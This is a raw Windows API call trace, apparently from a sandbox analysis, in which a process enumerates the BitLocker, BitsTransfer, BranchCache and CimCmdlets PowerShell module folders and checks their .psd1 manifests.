	[0046.678] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7860
	[0046.678] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.678] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.678] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.678] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.678] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.678] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.679] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.679] FindClose (in: hFindFile=0x1505fab7860 | out: hFindFile=0x1505fab7860) returned 1
	[0046.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.679] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c
	[0046.679] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", lpFilePart=0x0) returned 0x3d
	[0046.679] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8160
	[0046.679] FindNextFileW (in: hFindFile=0x1505fab8160, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.679] FindNextFileW (in: hFindFile=0x1505fab8160, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.679] FindNextFileW (in: hFindFile=0x1505fab8160, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.679] FindNextFileW (in: hFindFile=0x1505fab8160, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.679] FindNextFileW (in: hFindFile=0x1505fab8160, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.680] FindNextFileW (in: hFindFile=0x1505fab8160, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.680] FindNextFileW (in: hFindFile=0x1505fab8160, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.680] FindClose (in: hFindFile=0x1505fab8160 | out: hFindFile=0x1505fab8160) returned 1
	[0046.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.680] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c
	[0046.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.680] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0046.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.680] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c
	[0046.680] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\", lpFilePart=0x0) returned 0x3d
	[0046.680] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab8820
	[0046.680] FindNextFileW (in: hFindFile=0x1505fab8820, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.681] FindNextFileW (in: hFindFile=0x1505fab8820, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.681] FindNextFileW (in: hFindFile=0x1505fab8820, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.681] FindNextFileW (in: hFindFile=0x1505fab8820, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.681] FindNextFileW (in: hFindFile=0x1505fab8820, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.681] FindNextFileW (in: hFindFile=0x1505fab8820, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.681] FindNextFileW (in: hFindFile=0x1505fab8820, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.681] FindClose (in: hFindFile=0x1505fab8820 | out: hFindFile=0x1505fab8820) returned 1
	[0046.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.681] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psd1")) returned 0x20
	[0046.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.687] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f
	[0046.688] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", lpFilePart=0x0) returned 0x40
	[0046.688] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7fe0
	[0046.688] FindNextFileW (in: hFindFile=0x1505fab7fe0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.688] FindNextFileW (in: hFindFile=0x1505fab7fe0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.689] FindNextFileW (in: hFindFile=0x1505fab7fe0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.689] FindNextFileW (in: hFindFile=0x1505fab7fe0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.689] FindNextFileW (in: hFindFile=0x1505fab7fe0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.689] FindClose (in: hFindFile=0x1505fab7fe0 | out: hFindFile=0x1505fab7fe0) returned 1
	[0046.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.689] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f
	[0046.689] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", lpFilePart=0x0) returned 0x40
	[0046.689] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7ec0
	[0046.689] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.689] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.690] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.690] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.690] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.690] FindClose (in: hFindFile=0x1505fab7ec0 | out: hFindFile=0x1505fab7ec0) returned 1
	[0046.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.690] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f
	[0046.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.690] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.690] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f
	[0046.690] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", lpFilePart=0x0) returned 0x40
	[0046.690] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab8280
	[0046.690] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.691] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.691] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.691] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.691] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.691] FindClose (in: hFindFile=0x1505fab8280 | out: hFindFile=0x1505fab8280) returned 1
	[0046.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.691] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1")) returned 0x20
	[0046.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.692] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e
	[0046.692] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", lpFilePart=0x0) returned 0x3f
	[0046.692] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8760
	[0046.694] FindNextFileW (in: hFindFile=0x1505fab8760, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.694] FindNextFileW (in: hFindFile=0x1505fab8760, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.694] FindNextFileW (in: hFindFile=0x1505fab8760, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.694] FindNextFileW (in: hFindFile=0x1505fab8760, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.695] FindNextFileW (in: hFindFile=0x1505fab8760, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.695] FindNextFileW (in: hFindFile=0x1505fab8760, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.695] FindNextFileW (in: hFindFile=0x1505fab8760, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.695] FindNextFileW (in: hFindFile=0x1505fab8760, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.695] FindNextFileW (in: hFindFile=0x1505fab8760, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.695] FindNextFileW (in: hFindFile=0x1505fab8760, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.695] FindNextFileW (in: hFindFile=0x1505fab8760, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.695] FindNextFileW (in: hFindFile=0x1505fab8760, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.696] FindNextFileW (in: hFindFile=0x1505fab8760, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.696] FindNextFileW (in: hFindFile=0x1505fab8760, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.696] FindClose (in: hFindFile=0x1505fab8760 | out: hFindFile=0x1505fab8760) returned 1
	[0046.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.697] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e
	[0046.697] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", lpFilePart=0x0) returned 0x3f
	[0046.697] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7320
	[0046.698] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.698] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.698] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.699] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.699] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.699] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.699] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.699] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.699] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.699] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.699] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.699] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.700] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.700] FindNextFileW (in: hFindFile=0x1505fab7320, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.700] FindClose (in: hFindFile=0x1505fab7320 | out: hFindFile=0x1505fab7320) returned 1
	[0046.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.701] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e
	[0046.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.701] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0046.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.701] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e
	[0046.701] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", lpFilePart=0x0) returned 0x3f
	[0046.701] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab87c0
	[0046.702] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.703] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.703] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.703] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.703] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.703] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.703] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.703] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.703] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.704] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.704] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.704] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.704] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.704] FindNextFileW (in: hFindFile=0x1505fab87c0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.704] FindClose (in: hFindFile=0x1505fab87c0 | out: hFindFile=0x1505fab87c0) returned 1
	[0046.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.705] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\branchcache.psd1")) returned 0x20
	[0046.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.706] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7860
	[0046.707] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.707] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.707] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.708] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8220
	[0046.708] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.708] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.708] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.709] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7f20
